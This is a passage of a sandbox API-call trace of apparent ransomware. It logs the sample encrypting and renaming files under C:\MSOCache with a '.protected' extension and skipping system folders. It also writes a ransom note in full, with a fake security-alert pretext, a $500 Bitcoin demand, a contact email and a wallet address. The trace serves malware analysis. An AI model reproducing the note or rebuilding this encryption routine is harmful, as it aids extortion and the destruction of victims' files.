pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.116] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0063.116] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 79 [0063.116] StrStrW (lpFirst="PrjPrrWW.cab", lpSrch=".txt") returned 0x0 [0063.116] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 79 [0063.116] StrStrW (lpFirst="PrjPrrWW.cab", lpSrch=".rar") returned 0x0 [0063.116] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 79 [0063.116] StrStrW (lpFirst="PrjPrrWW.cab", lpSrch=".zip") returned 0x0 [0063.116] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.143] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.143] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.144] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.145] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0063.160] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0063.160] CloseHandle (hObject=0xb4) returned 1 [0063.161] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.protected") returned 89 [0063.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.protected")) returned 1 [0063.162] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0063.162] lstrcmpiW (lpString1="setup.exe", lpString2="Windows") returned -1 [0063.162] lstrcmpiW (lpString1="setup.exe", lpString2="Program Files") returned 1 [0063.162] lstrcmpiW (lpString1="setup.exe", lpString2="Program Files (x86)") returned 1 [0063.162] lstrcmpiW (lpString1="setup.exe", lpString2="$Recycle.bin") returned 1 [0063.162] lstrcmpiW (lpString1="setup.exe", lpString2="System Volume Information") returned -1 [0063.162] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0063.162] StrStrIW (lpFirst="setup.exe", lpSrch=".protected") returned 0x0 [0063.162] lstrcmpW (lpString1="setup.exe", lpString2="RESTORE_FILES.txt") returned 1 [0063.162] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.162] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.162] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0063.162] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0063.162] StrStrW (lpFirst="setup.exe", lpSrch=".txt") returned 0x0 [0063.162] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0063.162] StrStrW (lpFirst="setup.exe", lpSrch=".rar") returned 0x0 [0063.162] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0063.162] StrStrW (lpFirst="setup.exe", lpSrch=".zip") returned 0x0 [0063.162] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.177] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.177] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.178] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.178] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0063.187] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0063.187] CloseHandle (hObject=0xb4) returned 1 [0063.187] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.protected") returned 86 [0063.187] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.protected")) returned 1 [0063.188] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0063.188] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0063.188] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0063.188] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0063.188] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0063.188] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0063.188] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0063.188] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0063.188] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0063.188] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.188] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.188] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0063.189] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0063.189] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0063.189] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0063.189] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0063.189] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0063.189] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0063.189] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.199] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.199] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.199] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.199] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0063.207] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0063.207] CloseHandle (hObject=0xb4) returned 1 [0063.207] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0063.207] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0063.208] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0063.208] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0063.208] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0063.208] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0063.209] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0063.209] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0063.209] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0063.209] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0063.210] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0063.210] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0063.210] CloseHandle (hObject=0xa4) returned 1 [0063.210] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0063.210] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0063.210] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0063.210] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0063.210] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0063.210] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0063.210] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C") returned 66 [0063.210] lstrcmpW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0063.210] lstrcmpW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0063.210] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*") returned 68 [0063.210] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0063.231] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0063.231] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0063.231] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0063.231] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0063.231] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0063.231] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\.") returned 68 [0063.231] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0063.231] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0063.231] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0063.231] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.231] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.231] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.231] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0063.231] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0063.231] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0063.231] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0063.231] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0063.231] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0063.231] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\..") returned 69 [0063.231] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0063.231] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0063.231] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0063.231] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0063.232] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.232] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.232] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.232] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0063.232] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Windows") returned -1 [0063.232] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Program Files") returned -1 [0063.232] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Program Files (x86)") returned -1 [0063.232] lstrcmpiW (lpString1="Office32WW.msi", lpString2="$Recycle.bin") returned 1 [0063.232] lstrcmpiW (lpString1="Office32WW.msi", lpString2="System Volume Information") returned -1 [0063.232] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0063.232] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".protected") returned 0x0 [0063.232] lstrcmpW (lpString1="Office32WW.msi", lpString2="RESTORE_FILES.txt") returned -1 [0063.232] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.232] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.232] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0063.232] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0063.232] StrStrW (lpFirst="Office32WW.msi", lpSrch=".txt") returned 0x0 [0063.232] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0063.232] StrStrW (lpFirst="Office32WW.msi", lpSrch=".rar") returned 0x0 [0063.232] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0063.233] StrStrW (lpFirst="Office32WW.msi", lpSrch=".zip") returned 0x0 [0063.233] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.465] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.465] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.615] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.615] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0063.631] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0063.631] CloseHandle (hObject=0xb4) returned 1 [0063.632] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.protected") returned 91 [0063.632] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.protected")) returned 1 [0063.632] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0063.632] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Windows") returned -1 [0063.632] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Program Files") returned -1 [0063.632] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Program Files (x86)") returned -1 [0063.632] lstrcmpiW (lpString1="Office32WW.xml", lpString2="$Recycle.bin") returned 1 [0063.632] lstrcmpiW (lpString1="Office32WW.xml", lpString2="System Volume Information") returned -1 [0063.632] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0063.633] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".protected") returned 0x0 [0063.633] lstrcmpW (lpString1="Office32WW.xml", lpString2="RESTORE_FILES.txt") returned -1 [0063.633] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.633] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.633] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 